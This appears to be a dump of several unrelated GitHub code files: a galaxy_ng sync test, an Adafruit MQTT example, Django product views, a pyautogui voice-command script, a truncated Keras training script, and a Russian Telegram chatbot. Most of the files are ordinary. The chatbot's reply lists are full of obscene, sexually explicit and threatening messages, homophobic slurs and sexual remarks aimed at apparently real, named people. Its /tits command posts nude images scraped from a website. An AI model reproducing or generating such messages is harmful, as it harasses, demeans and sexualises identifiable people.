lacinia eros maximus a. Quisque \"\n \"euismod sapien nunc, in auctor eros blandit id. Proin pretium hendrerit \"\n \"augue, non sagittis dolor rhoncus a. Nullam vel est vel neque scelerisque\"\n \" condimentum. Integer efficitur ex eu augue laoreet, ut volutpat velit \"\n \"volutpat. Morbi id arcu sed dolor tincidunt pulvinar ac sed sem. Mauris \"\n \"posuere neque velit.\\n\\n\"\n \"Curabitur ultricies odio leo, hendrerit interdum felis semper ut. Aliquam\"\n \" eleifend leo quis ante faucibus tincidunt. In porttitor, quam nec molestie\"\n \" convallis, tortor ante ultricies arcu, et semper ligula sem quis enim. \"\n \"Nullam eleifend eros vitae mi luctus, in pellentesque nibh consequat. \"\n \"Curabitur magna risus, dignissim a convallis non, semper eu enim. \"\n \"Suspendisse vulputate sapien diam, in semper nulla fermentum at. Ut \"\n \"interdum sollicitudin suscipit. Etiam tempus ultrices ante, at sodales \"\n \"eros blandit vitae. Nulla facilisi. 
Nullam id vulputate quam, vel sagittis \"\n \"tortor. Vestibulum dolor mauris, lobortis sit amet justo rutrum, scelerisque \"\n \"iaculis purus. Pellentesque pharetra imperdiet erat, vitae vestibulum ipsum \"\n \"commodo eu. Donec tristique tortor tempor orci convallis finibus. Integer \"\n \"nec sagittis lectus. In ullamcorper laoreet nunc, quis mattis neque commodo \"\n \"in. Vestibulum eu risus sapien.\\n\\n\"\n ),\n }\n\n ns = crc_client(\n \"v3/namespaces/ansible/\",\n args=ns_data,\n method=\"PUT\",\n )\n\n clear_certified(pah_client)\n\n perform_sync(pah_client, crc_config)\n _assert_namespace_sync(pah_client, crc_client, ns)\n\n # update the namespace and sync again to verify that the new changes are\n # pulled down\n ns = crc_client(\n \"v3/namespaces/ansible/\",\n args={\n **ns_data,\n \"description\": \"foo\",\n \"avatar_url\": \"https://avatars.githubusercontent.com/u/1507452\"\n }\n )\n\n perform_sync(pah_client, crc_config)\n _assert_namespace_sync(pah_client, crc_client, ns)\n","repo_name":"ansible/galaxy_ng","sub_path":"galaxy_ng/tests/integration/api/test_certified_sync.py","file_name":"test_certified_sync.py","file_ext":"py","file_size_in_byte":10864,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"72"} +{"seq_id":"15622370681","text":"import board\nimport busio\nfrom digitalio import DigitalInOut\nimport neopixel\nfrom adafruit_esp32spi import adafruit_esp32spi\nfrom adafruit_esp32spi import adafruit_esp32spi_wifimanager\nimport adafruit_esp32spi.adafruit_esp32spi_socket as socket\n\nimport adafruit_minimqtt.adafruit_minimqtt as MQTT\n\n### WiFi ###\n\n# Get wifi details and more from a secrets.py file\ntry:\n from secrets import secrets\nexcept ImportError:\n print(\"WiFi secrets are kept in secrets.py, please add them there!\")\n raise\n\n# If you are using a board with pre-defined ESP32 Pins:\nesp32_cs = DigitalInOut(board.ESP_CS)\nesp32_ready = DigitalInOut(board.ESP_BUSY)\nesp32_reset = DigitalInOut(board.ESP_RESET)\n\n# If you have an externally connected ESP32:\n# esp32_cs = DigitalInOut(board.D9)\n# esp32_ready = DigitalInOut(board.D10)\n# esp32_reset = DigitalInOut(board.D5)\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\n\"\"\"Use below for Most Boards\"\"\"\nstatus_light = neopixel.NeoPixel(\n board.NEOPIXEL, 1, brightness=0.2\n) # Uncomment for Most Boards\n\"\"\"Uncomment below for ItsyBitsy M4\"\"\"\n# status_light = dotstar.DotStar(board.APA102_SCK, board.APA102_MOSI, 1, brightness=0.2)\n# Uncomment below for an externally defined RGB LED\n# import adafruit_rgbled\n# from adafruit_esp32spi import PWMOut\n# RED_LED = PWMOut.PWMOut(esp, 26)\n# GREEN_LED = PWMOut.PWMOut(esp, 27)\n# BLUE_LED = PWMOut.PWMOut(esp, 25)\n# status_light = adafruit_rgbled.RGBLED(RED_LED, BLUE_LED, GREEN_LED)\nwifi = adafruit_esp32spi_wifimanager.ESPSPI_WiFiManager(esp, secrets, status_light)\n\n### Topic Setup ###\n\n# MQTT Topic\n# Use this topic if you'd like to connect to a standard MQTT broker\nmqtt_topic = \"test/topic\"\n\n# Adafruit IO-style Topic\n# Use this topic if you'd like to connect to io.adafruit.com\n# mqtt_topic = 'aio_user/feeds/temperature'\n\n### Code ###\n\n\n# Define callback methods which are called when events occur\n# pylint: disable=unused-argument, redefined-outer-name\ndef connect(client, userdata, flags, rc):\n # This function will be called when the client is connected\n # successfully to the broker.\n print(\"Connected 
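_assert_namespace_sync above closes by downloading both avatars and comparing SHA-256 digests. That integrity check, isolated into a helper that streams the download; the URLs in the usage note are placeholders:

```python
import hashlib
import requests

def sha256_of_url(url: str) -> str:
    # Stream the body so large files never sit fully in memory twice.
    resp = requests.get(url, allow_redirects=True, stream=True, timeout=30)
    resp.raise_for_status()
    digest = hashlib.sha256()
    for chunk in resp.iter_content(chunk_size=8192):
        digest.update(chunk)
    return digest.hexdigest()

# Usage sketch with hypothetical URLs:
# assert sha256_of_url(crc_avatar_url) == sha256_of_url(pah_avatar_url)
```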
to MQTT Broker!\")\n print(\"Flags: {0}\\n RC: {1}\".format(flags, rc))\n\n\ndef disconnect(client, userdata, rc):\n # This method is called when the client disconnects\n # from the broker.\n print(\"Disconnected from MQTT Broker!\")\n\n\ndef subscribe(client, userdata, topic, granted_qos):\n # This method is called when the client subscribes to a new feed.\n print(\"Subscribed to {0} with QOS level {1}\".format(topic, granted_qos))\n\n\ndef unsubscribe(client, userdata, topic, pid):\n # This method is called when the client unsubscribes from a feed.\n print(\"Unsubscribed from {0} with PID {1}\".format(topic, pid))\n\n\ndef publish(client, userdata, topic, pid):\n # This method is called when the client publishes data to a feed.\n print(\"Published to {0} with PID {1}\".format(topic, pid))\n\n\n# Get certificate and private key from a certificates.py file\ntry:\n from certificates import DEVICE_CERT, DEVICE_KEY\nexcept ImportError:\n print(\n \"Certificate and private key data is kept in certificates.py, please add them there!\"\n )\n raise\n\n# Set Device Certificate\nesp.set_certificate(DEVICE_CERT)\n\n# Set Private Key\nesp.set_private_key(DEVICE_KEY)\n\n# Connect to WiFi\nprint(\"Connecting to WiFi...\")\nwifi.connect()\nprint(\"Connected!\")\n\n# Initialize MQTT interface with the esp interface\nMQTT.set_socket(socket, esp)\n\n# Set up a MiniMQTT Client\nclient = MQTT.MQTT(\n broker=secrets[\"broker\"], username=secrets[\"user\"], password=secrets[\"pass\"]\n)\n\n# Connect callback handlers to client\nclient.on_connect = connect\nclient.on_disconnect = disconnect\nclient.on_subscribe = subscribe\nclient.on_unsubscribe = unsubscribe\nclient.on_publish = publish\n\nprint(\"Attempting to connect to %s\" % client.broker)\nclient.connect()\n\nprint(\"Subscribing to %s\" % mqtt_topic)\nclient.subscribe(mqtt_topic)\n\nprint(\"Publishing to %s\" % mqtt_topic)\nclient.publish(mqtt_topic, \"Hello Broker!\")\n\nprint(\"Unsubscribing from %s\" % mqtt_topic)\nclient.unsubscribe(mqtt_topic)\n\nprint(\"Disconnecting from %s\" % client.broker)\nclient.disconnect()\n","repo_name":"adafruit/Adafruit_CircuitPython_MiniMQTT","sub_path":"examples/esp32spi/minimqtt_certificate_esp32spi.py","file_name":"minimqtt_certificate_esp32spi.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"70037863272","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport random\nimport telebot\nimport time\n\nfrom bs4 import BeautifulSoup\nfrom urllib import request\n\n# Create an object of a bot\nbot = telebot.TeleBot(\"TOKEN\")\n\n''' ---------------------------------------------------------------------------------------------------------------- '''\n\nbot_names = ['Вася', 'вася', 'Васёк', 'васёк', 'Васек', 'васек', 'Васька', 'васька', 'Василий', 'василий', 'Васе',\n 'васе', 'Васю', 'васю', 'Васи', 'васи', 'Вась', 'вась', 'Ваське', 'ваське', 'Ваську', 'ваську', 'Василию',\n 'василию', 'Vasek', 'vasek', 'VASEK', 'ВАСИЛИЮ', 'ВАСЯ', 'ВАСЁК', 'ВАСЕК', 'ВАСЬКА', 'ВАСИЛИЙ', 'ВАСЕ',\n 'ВАСЮ', 'ВАСИ', 'ВАСЬ', 'ВАСЬКЕ', 'ВАСЬКУ']\n\nactivity_words = ['Что делаешь', 'что делаешь', 'Чё делаешь', 'чё делаешь', 'Че делаешь', 'че делаешь', 'Чо делаешь',\n 'чо делаешь', 'Шо делаешь', 'шо делаешь', 'Што делаешь', 'што делаешь', 'Чем занят', 'чем занят',\n 'Чё мутишь', 'чё мутишь', 'Че мутишь', 'че мутишь', 'Шо мутишь', 'шо мутишь', 'как ты там',\n 'как ты там', 'там у тебя', 'ЧЕМ ЗАНЯТ', 'ЧТО ДЕЛАЕШЬ', 'ЧЕ ДЕЛАЕШЬ', 'ЧО ДЕЛАЕШЬ', 'ШО 
ДЕЛАЕШЬ',\n 'ШТО ДЕЛАЕШЬ', 'ШО МУТИШЬ']\n\ngoodbye_words = ['Пока', 'пока', 'Споки', 'споки', 'Спочки', 'спочки', 'Спокойной ночи', 'спокойной ночи', 'ПОКА']\n\nhello_words = ['Привет', 'привет', 'Здарова', 'здарова', 'Хай', 'хай', 'Салют', 'салют', 'ПРИВЕТ', 'ЗДАРОВА', 'ХАЙ']\n\nmood_words = ['Как дела', 'как дела', 'Как настроение', 'как настроение', 'Как у тебя дела', 'как у тебя дела',\n 'Как у тебя настроение', 'как у тебя настроение', 'Че как', 'че как', 'Че каво', 'че каво', 'Как ты',\n 'как ты', 'Как поживаешь', 'как поживаешь', 'КАК ПОЖИВАЕШЬ', 'КАК ДЕЛА', 'КАК НАСТРОЕНИЕ', 'ЧО КАК']\n\nrandom_words = ['Скажи', 'скажи', 'скажешь', 'Что ещё', 'что ещё', 'Шо ещё', 'шо ещё', 'Чё ещё', 'чё ещё', 'Чо ещё',\n 'чо ещё', 'Что-нибудь', 'что-нибудь', 'Шо недь', 'шо недь', 'Што-нибудь', 'што-нибудь', 'Че-недь',\n 'че-недь', 'Чё недь', 'чё недь', 'Чо недь', 'чо недь', 'Шо нибудь', 'шо нибудь', 'Што-недь', 'што-недь',\n 'ЧО НЕДЬ', 'ШО НИБУДЬ']\n\nrude_words = ['Хуй', 'хуй', 'Соси', 'соси', 'Пид', 'пид', 'Лох', 'лох', 'Тупой', 'тупой', 'Тупица', 'тупица', 'Уёб',\n 'уёб', 'Уеб', 'уеб', 'Даун', 'даун', 'Сука', 'сука', 'Пизд', 'пизд', 'Сосать', 'сосать', 'Придурок',\n 'придурок', 'Идиот', 'идиот', 'Чмо', 'чмо', 'Чёрт', 'чёрт', 'Черт', 'черт', 'Долбо', 'долбо', 'Ублюдок',\n 'ублюдок', 'Суч', 'суч', 'Гнида', 'гнида', 'Шлю', 'шлю', 'Гондон', 'гондон']\n\nwhy_words = ['Почему', 'почему', 'А что так', 'а что так', 'А чё так', 'а чё так', 'А шо так', 'а шо так', 'Зачем',\n 'зачем', 'Нахуя', 'нахуя', 'Нахрен', 'нахрен']\n\npetrovich_answers = {0: 'сука хачу питровича!', 1: 'хочу бухать суки', 2: 'дай мне питровича падла)))', 3: 'хочу суку',\n 4: 'дайти водяры суки', 5: 'пошли бухать питровича детка))))'}\n\nartem_words = ['Артём', 'артём', 'Артем', 'артем', 'Тёма', 'тёма']\nilya_words = ['Илья', 'илья', 'Илюша', 'илюша', 'Илье', 'илье', 'Илью', 'илью']\nlera_words = ['Лера', 'лера', 'Лерк', 'лерк', 'Леру', 'леру', 'Лере', 'лере']\nroman_words = ['Рома', 'рома', 'Ромо', 'ромо']\nsonya_words = ['Соня', 'соня', 'Соньк', 'соньк', 'Соню', 'соню', 'Соне', 'соне']\n\n''' ---------------------------------------------------------------------------------------------------------------- '''\n\nactivity_answers = {0: 'сижу общаюсь с тобой че не видеш', 1: 'сую хуй тебе в рот))))', 2: 'играю в гта крмпэшку',\n 3: 'тараню твой рот балтом', 4: 'общаюсь с соской кокойто', 5: 'пирданул в нос тебе а что????',\n 6: 'слушай мне не до тебя говори чё хочеш', 7: 'ща подожди одаааа сука пёрнул в тебя', 8: 'хаваю',\n 9: 'ем огурец а чё', 10: 'пишу тебе в телеграме идиотина', 11: 'бухаю пивас', 12: 'смотрю телик',\n 13: 'дрочу и ща кончю на тебя оооо дааааа суааааааа'}\n\ngoodbye_answers = {0: 'аливидерчи)))', 1: 'ага', 2: 'гудбай лошара)', 3: 'пиздуй))', 4: 'адиос амигос сука подсасывай',\n 5: 'пака и подпишись на канал сучка)))', 6: 'прощай', 7: 'вали подальше', 8: 'вот и идика ты нахуй',\n 9: 'пока но наа даче будет жара када ебать тя буду', 10: '66', 11: 'смари не падавись моим шлангом',\n 12: 'пока машка))))', 13: 'до встречи с моим членам'}\n\nhello_answers = {0: 'здарово', 1: 'ну привет', 2: 'хай сука))', 3: 'ага', 4: 'гутэнтак)))', 5: 'банжур епта', 6: 'хай',\n 7: 'салют сучька!)', 8: 'здраствуйте', 9: 'привет соска', 10: 'привет бот)))', 11: 'хай и саси сразу',\n 12: 'хочеш общаца? давай сука', 13: 'базарь'}\n\nmood_answers = {0: 'нормальна. 
а че те?', 1: 'хуёва', 2: 'зоебись))', 3: 'так се', 4: 'норма', 5: 'тя не ебать должно',\n 6: 'нормас хочу трахаца в троём я лерка сонька)))))', 7: 'а вот так что у тебя весь рот в моей сперми',\n 8: 'как ты думаеш когда у меня хуй большой те в рот не влезет??', 9: 'по жопе бы те надавать сучбка))',\n 10: 'ща покажу те свой хуй узнаеш', 11: 'отсоси узнаеш', 12: 'а щто хочешь от меня?', 13: 'хз бля чёте',\n 14: 'неебу дальше што', 15: 'вс отлично вчера леру трахнул хорошо было стонала сука)))'}\n\nrandom_answers = {0: 'я люблю лерку но эта сучка меня не любет', 1: 'соню выдрать хочеца очень))',\n 2: 'рома пидафил ебаный бородатый черт саси хуй', 3: 'артем питух соси', 4: 'илья лох я те ёбну',\n 5: 'хз чё расказать. го на сервак я тя админом сделаю))))))', 6: 'када бухать суки на дачю', 7: 'пнх',\n 8: 'ниче не хочу говорить иди нахуй', 9: 'если никитос еще раз будет пиздить я ево ушатаю суку',\n 10: 'подпишись https://www.youtube.com/channel/UCV0XK4xmltqmn5tY6by4NbA', 11: 'соси болт сучка)))',\n 12: 'яне насрать под губу с насваем пусть сасет дальше', 13: 'кто хочет сасать давай иди сюда сука',\n 14: 'нах ваш ебаный телеграмм'}\n\nrude_answers = {0: 'иди нахуй сука', 1: 'саси', 2: 'ты шлюшка тупая отсаси мой хуй', 3: 'ты сука отсоси мой болт',\n 4: 'отсоси мне', 5: 'сучка я тя ушатаю', 6: 'завали ебала сука', 7: 'заткнись', 8: 'прососи хуй дура',\n 9: 'я тя уебу падлюка', 10: 'ты сука тупая пошла нахуй тварь', 11: 'я твой хуй разработаю лох',\n 12: 'соска рот закрой', 13: 'понюхай очко моё сучара', 14: 'смотри сюда --------> соси', 15: 'ди на',\n 16: 'чё срака красная? иди проспись', 17: 'пошла нахуй', 18: 'давай едь на дачу я тебя ебать буду',\n 19: 'иди сюда я те пасасать дам', 20: 'ехай нахуй'}\n\nwhat_answers = {0: 'че?', 1: 'хули надо', 2: 'ну?', 3: 'че те блять', 4: '?', 5: 'чо сука', 6: 'саси ево 3====э',\n 7: 'ш��о хотела сучька?', 8: 'ты мне бля', 9: 'да', 10: 'што', 11: 'ну пизди тока хуй высунь изо рта',\n 12: 'говори дальше сука', 13: 'жду', 14: 'я тут есличё'}\n\nwhy_answers = {0: 'хуй ево знает я занет атвали)))', 1: 'незнаю', 2: 'не ебу', 3: 'я не в настраении отвачать',\n 4: 'потомучьто ты прососка)', 5: 'шоб ты спросила', 6: 'я уебок наверна', 7: 'просто', 8: 'хз иди нах',\n 9: 'хз', 10: 'понятья неимею', 11: 'какая тибе разница', 12: 'тя не ибёт', 13: 'саси а не спрашивай))',\n 14: 'давай саси не останавливайся'}\n\n# rude_answers5 = {0: '', 1: '', 2: '', 3: '', 4: '', 5: '', 6: '', 7: '', 8: '', 9: '', 10: '', 11: '', 12: '', 13: ''}\n\n''' ---------------------------------------------------------------------------------------------------------------- '''\n# гей дон гондон протаранить рот ну сучька давай давай сделай это\n\n\n# Bot hello messages\ndef say_hello(message):\n for word in hello_words:\n if word in message.text:\n bot.send_message(message.chat.id, hello_answers[random.randrange(0, len(hello_answers))])\n return 0\n\n\n# Bot mood messages\ndef say_mood(message):\n for word in mood_words:\n if word in message.text:\n bot.send_message(message.chat.id, mood_answers[random.randrange(0, len(mood_answers))])\n return 0\n\n\n# Bot activity messages\ndef say_activity(message):\n for word in activity_words:\n if word in message.text:\n bot.send_message(message.chat.id, activity_answers[random.randrange(0, len(activity_answers))])\n return 0\n\n\n# Bot goodbye messages\ndef say_goodbye(message):\n for word in goodbye_words:\n if word in message.text:\n bot.send_message(message.chat.id, goodbye_answers[random.randrange(0, len(goodbye_answers))])\n return 0\n\n\n# Bot why 
messages\ndef say_why(message):\n for word in why_words:\n if word in message.text:\n bot.send_message(message.chat.id, why_answers[random.randrange(0, len(why_answers))])\n return 0\n\n\n# Bot respond messages\ndef say_what(message):\n bot.send_message(message.chat.id, what_answers[random.randrange(0, len(what_answers))])\n return 0\n\n\n# Bot rude messages\ndef say_swearword(message):\n for word in rude_words:\n if word in message.text:\n bot.send_message(message.chat.id, rude_answers[random.randrange(0, len(rude_answers))])\n return 0\n\n\n# Bot tells his thoughts\ndef say_something(message):\n for word in random_words:\n if word in message.text:\n bot.send_message(message.chat.id, random_answers[random.randrange(0, len(random_answers))])\n return 0\n\n\n''' ---------------------------------------------------------------------------------------------------------------- '''\n\n\n# Command 'help' handling\n@bot.message_handler(commands=['help'])\ndef help_message(message):\n msg = '''\n*************************\n****** Vasek Bot v1.2 ******\n*************************\n \n Список команд:\n /help - вызов окна поддержки\n /start, /test - приветственное сообщение\n /time - информация о времени\n /tits - отправить сиськи\n\n Заметки:\n > Vasek является аппроксимированной копией блогера и геймера Василия Придатченко из клана SKK\n \n > Vasek не реагирует на сообщения, в которых не упоминается его имя (почти)\n\n > Vasek не всегда адекватен, поэтому не стоит на него злиться... но и злить его тоже не стоит :)\n\n > Vasek может стать лучше благодаря вам, так что предлагайте свои идеи по его усовершенствованию\n\n (с) Eugen Crack\n'''\n bot.send_message(message.chat.id, msg)\n\n\n# Command 'start' and 'test' handling\n@bot.message_handler(commands=['start', 'test'])\ndef start_message(message):\n bot.send_message(message.chat.id, 'я тут')\n\n\n# Command 'time' handling\n@bot.message_handler(commands=['time'])\ndef time_message(message):\n summer_days = 92\n today = datetime.date.today()\n next_year = today.year + 1\n\n last_summer_day = datetime.date(today.year, 9, 1)\n new_year_day = datetime.date(next_year, 1, 1)\n boys_day = datetime.date(next_year, 2, 23)\n girls_day = datetime.date(next_year, 3, 8)\n win_day = datetime.date(next_year, 5, 9)\n rus_day = datetime.date(next_year, 6, 12)\n artem_day = datetime.date(next_year, 1, 5)\n ilya_day = datetime.date(next_year, 2, 23)\n lera_day = datetime.date(next_year, 3, 5)\n nikita_day = datetime.date(next_year, 6, 17)\n roman_day = datetime.date(next_year, 3, 8)\n# sonya_day = datetime.date(next_year, 1, 1) # ?????\n vasya_day = datetime.date(next_year, 1, 3)\n yana_day = datetime.date(next_year, 5, 15)\n\n diff_summer = last_summer_day - today\n diff_new_year = new_year_day - today\n diff_boys = boys_day - today\n diff_girls = girls_day - today\n diff_win = win_day - today\n diff_rus = rus_day - today\n diff_artem = artem_day - today\n diff_ilya = ilya_day - today\n diff_lera = lera_day - today\n diff_nikita = nikita_day - today\n diff_roman = roman_day - today\n diff_sonya = today - today\n diff_vasya = vasya_day - today\n diff_yana = yana_day - today\n\n msg = '''\nСегодня {}\nПроёбано {} дней лета... 
осталось {}\n----------------------------------------------------------\n > Новый год через {}д\n > День пацанов через {}д\n > День тёлок через {}д\n > Деды победят через {}д\n > День России через {}д\n----------------------------------------------------------\n > День рождения Артёма через {}д\n > День рождения Васи через {}д\n > День рождения Ильи через {}д\n > День рождения Леры через {}д\n > День рождения Никиты через {}д\n > День рождения Романа через {}д\n > День рождения Сони через {}д\n > День рождения Яны через {}д\n'''.format(today.strftime('%d.%m.%Y'), summer_days - diff_summer.days, diff_summer.days, diff_new_year.days,\n diff_boys.days, diff_girls.days, diff_win.days, diff_rus.days, diff_artem.days, diff_vasya.days,\n diff_ilya.days, diff_lera.days, diff_nikita.days, diff_roman.days, diff_sonya.days, diff_yana.days)\n bot.send_message(message.chat.id, msg)\n\n\n# Command 'tits' handling\n@bot.message_handler(commands=['tits'])\ndef tits_message(message):\n url = 'http://boobs-selfshots.tumblr.com/random'\n resp = request.urlopen(url)\n html = resp.read()\n parser = BeautifulSoup(html, 'html.parser')\n tag = parser.find_all('div', {'class': 'photo_post'})[0].a\n\n if tag is not None:\n img = tag.img\n else:\n img = parser.find_all('div', {'class': 'photo_post'})[0].img\n\n link = img['src']\n bot.send_message(message.chat.id, link)\n\n\n# Received message handling, 'sleep' for a little delay before answering\n@bot.message_handler(content_types=['text'])\ndef check_message(message):\n if 'петрович' in message.text or 'питрович' in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, petrovich_answers[random.randrange(0, len(petrovich_answers))])\n return\n\n # ~10% chance to do that block\n if random.randrange(0, 10) == 5:\n for artem in artem_words:\n if artem in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'артем питух)))')\n return\n\n for ilya in ilya_words:\n if ilya in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'илья олкаш ебаный)')\n return\n\n for lera in lera_words:\n if lera in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'я люблю и хочю лерку')\n return\n\n for roman in roman_words:\n if roman in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'рома это пидар)))')\n return\n\n for sonya in sonya_words:\n if sonya in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'я хочю потрахаца с соней)))')\n return\n\n for name in bot_names:\n if name in message.text:\n time.sleep(random.randrange(3, 7))\n\n # Greetings!\n if say_hello(message) == 0:\n break\n\n # How r u?\n if say_mood(message) == 0:\n break\n\n # Why?\n if say_why(message) == 0:\n break\n\n # Wut r u doing?\n if say_activity(message) == 0:\n break\n\n # Say something!\n if say_something(message) == 0:\n break\n\n # Rude words\n if say_swearword(message) == 0:\n break\n\n # Good bye\n if say_goodbye(message) == 0:\n break\n\n # Bot responds\n if say_what(message) == 0:\n break\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","repo_name":"insotriplesix/dp","sub_path":"bots/telegram/vasek/src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":20065,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"25641364359","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as 
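The /time handler above is built entirely on datetime.date subtraction: a date minus a date is a timedelta, and its .days attribute is the whole-day gap that fills every slot in the report. The core arithmetic in isolation:

```python
import datetime

today = datetime.date.today()
new_year = datetime.date(today.year + 1, 1, 1)

remaining = new_year - today  # a datetime.timedelta
print("days until New Year:", remaining.days)

# A date minus itself is a zero-day delta, which is how the handler
# above papers over the one birthday it does not actually know.
assert (today - today).days == 0
```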
plt\nfrom Perceptron import Perceptron\n\ntraining = pd.read_csv('dados/dados_2D_parabola.csv')\n\ntraining_x = training['x'].to_numpy()\ntraining_y = training['y'].to_numpy()\nlabels = training['classificacao'].to_numpy()\n\n\nx = np.array(training_x)\ny = np.array(training_y) \n\nperceptron = Perceptron(201)\n\n\nperceptron.train(y, labels)\n\n##perceptron.train(training_inputs, labels)\n\nperceptron.predict(x)\n\n\nperceptron.data_plot(x, y, 201)\n\nperceptron.write_result()","repo_name":"RaulLima2/Perceptron-with-Python","sub_path":"perceptron with one layer/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41785380437","text":"from django import http\nfrom django.core.files.base import File\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import redirect, render\n\nfrom rest_framework import viewsets\nfrom .serializers import ProductSerializer\nfrom .models import Product,Category,Image\nfrom .forms import CreateProduct, UpdateImage\n\nfrom io import BytesIO\nfrom django.core.files.storage import FileSystemStorage\n\nfrom django.http import JsonResponse, request\nfrom django.core import serializers\nimport json\nfrom django.forms import modelformset_factory\n\nclass ProductView(viewsets.ModelViewSet):\n serializer_class = ProductSerializer\n queryset = Product.objects.all()\n# Create your views here.\n\ndef create(request):\n\n if request.method == \"GET\":\n categories=Category.objects.filter(depth=0)\n form=CreateProduct()\n\n return render(request,'create.html',{'form':form,'categories':categories})\n\n\n if request.method == \"POST\":\n form=CreateProduct(data=request.POST, files=request.FILES)\n \n\n specs=json.loads(request.POST[\"json-specs\"])\n ##print(specs)\n \n\n\n if form.is_valid():\n new=form.save()\n # ##print(f'FILES----------------------{request.FILES.getlist('images')}')\n fs = FileSystemStorage()\n print(request.FILES.getlist('images'))\n for image in request.FILES.getlist('images'):\n \n filename = fs.save(image.name, image)\n new.image_set.create(image=filename)\n for key in specs:\n ##print(key, '->', specs[key])\n new.spec_set.create(name=key, spec=specs[key])\n\n\n ##print(form.instance.pk)\n return redirect('index')\n else:\n ##print (f'form: {form.errors[\"category\"]}')\n return render(request,'create.html',{'form':form,'categories':Category.objects.filter(depth=0)})\n\n\n\n\ndef update_product(request, pk):\n product=Product.objects.get(pk=pk)\n images=product.image_set.all()\n categories=[]\n categories_temp=[]\n category=product.category\n images_initial=[]\n UpdateImageFormset=modelformset_factory(\n Image,form=UpdateImage,can_delete=True)\n while True:\n #print(f\"loop{category.depth} {category.name}\")\n if category.depth !=0:\n parent=Category.objects.get(pk=category.parentPk.pk)\n categories_temp=Category.objects.filter(depth=category.depth).filter(parentPk=parent)\n \n categories.insert(0,categories_temp)\n category=parent\n else:\n categories_temp=Category.objects.filter(depth=category.depth)\n categories.insert(0,categories_temp)\n break\n\n \n \n\n\n if request.method == \"GET\":\n initial_dict={\n \"name\": product.name,\n \"description\":product.description,\n \"detail\":product.detail,\n \"price\":product.price,\n \"stock\":product.stock,\n \"category\":product.category,\n \"highlighted\":product.highlighted,\n \"new\":product.new,\n \"main_image\":product.main_image\n\n\n\n\n }\n \n 
form=CreateProduct(initial=initial_dict)\n\n        formset_images=UpdateImageFormset(queryset=images,prefix='images')\n        #print(formset_images)\n        return render(request,'update.html',{'form':form,'form_images':formset_images,\"categories\":categories})\n\n    if request.method == \"POST\":\n        forms=[]\n\n        form=CreateProduct(data=request.POST, files=request.FILES,instance=product)\n        \n\n        form_images=UpdateImageFormset(data=request.POST, files=request.FILES,prefix='images')\n        \n        \n        if form.is_valid() and form_images.is_valid():\n            new=form.save()\n            for form in form_images:\n                \n                form.save()\n            \n            fs = FileSystemStorage()\n            for image in request.FILES.getlist('images'):\n                \n                filename = fs.save(image.name, image)\n                new.image_set.create(image=filename)\n\n            \n            return redirect('index')\n        else:\n            return render(request,'update.html',{'form':form,'form_images':form_images,'categories':Category.objects.filter(depth=0)})\n\n\n\ndef ajax_delete_image(request):\n    pk=request.GET.get(\"pk\",None)\n    print(pk)\n    Image.objects.get(pk=int(pk)).delete()\n    return HttpResponse(\"success\")\n\ndef ajax_delete_product(request):\n    pk=request.GET.get(\"pk\",None)\n    \n    Product.objects.get(pk=int(pk)).delete()\n    return HttpResponse(\"success\")\n\n    \n\n\ndef load_categories(request):\n    \n    ###print(\"load categories\")\n\n\n\n    categoriesHtml=[]\n    categoriesAll=[]\n    category_id = request.GET.get('category')\n    \n    \n    category=Category.objects.get(id=category_id)\n    \n    categories=Category.objects.filter(parentPk=category)\n\n\n    ##print(categories)\n\n    return JsonResponse(serializers.serialize('python', categories),safe=False)","repo_name":"tfcl/albiclick","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26916507657","text":"import pyautogui\nimport os\nimport time\n\n\ndef convert_command(command):\n    if \"start simulation\" in command:\n        return \"mpirun -n 1 ~parafem/p121 p121-demo\"\n    elif \"stop simulation\" in command:\n        return \"putsa\"\n    elif \"increase stiffness\" in command:\n        return \"villous\"\n    else:\n        return \"error\"\n\npath = '/Users/alexbrown/Desktop/Vosk/vosk-api/python/example/listfile.txt'\nlast_updated = os.path.getctime(path)\nfirst = True\nf = open(\"listfile.txt\", \"r\")\ntime.sleep(3)\nwhile True:\n    c_time = os.path.getctime(path)\n\n    if not first:\n        if c_time == last_updated:\n            print(\"no change\")\n        else:\n            print(\"change\")\n            f = open(\"listfile.txt\", \"r\")\n            last_updated = c_time\n            line = f.readline()\n            if not line:\n                break\n            fortran_command = convert_command(line.lower().strip())\n            print(\"new command = \" + fortran_command)\n            if fortran_command == \"error\":\n                continue\n            else:\n                pyautogui.write(fortran_command)\n                pyautogui.press('enter')\n    elif first:\n        first = False\n        line = f.readline()\n        if not line:\n            break\n        fortran_command = convert_command(line.lower().strip())\n        pyautogui.write(fortran_command)\n        pyautogui.press('enter')\n    f.close()\n    time.sleep(2)\n\n    \n    \n    \n    \n\n","repo_name":"alexbrown98/MikeVosk","sub_path":"example/test_scripts.py","file_name":"test_scripts.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71144656232","text":"'''\nbuild a DNN model to distinguish horse and human\ndata source:\nwget --no-check-certificate 